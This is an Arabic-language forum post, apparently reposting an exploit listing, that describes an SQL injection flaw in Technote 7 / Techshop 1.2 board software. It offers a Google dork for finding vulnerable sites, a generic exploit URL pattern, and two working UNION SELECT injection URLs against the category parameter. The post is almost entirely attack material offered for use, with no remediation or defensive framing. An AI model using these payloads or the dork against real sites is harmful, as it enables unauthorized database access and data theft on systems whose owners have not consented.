عرض مشاركة واحدة
قديم 01-02-2011, 03:58 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Dr.NaNo
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي Tech Shop Technote 7 SQL Injection Vulnerability



سلام عليكم شباب كيفكم ..


كود:
 # Google Dork: inurl:/technote/board.php?category=


Exploit :  
 http://site/board.php?board=boarname&category=[SQL Line]

--------------------------------------------------------------------------

PoC(Technote7) :  
 http://localhost/board.php?board=skinmarket&category=11 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61--
 
PoC(Technote7 - Techshop 1.2) :
 
 http://localhost/board.php?board=agcmain&category=10 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--
اكثر ....


بالتوفيق للجميع .


Dr.NaNo



Tech Shop Technote 7 SQL Injection Vulnerability

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس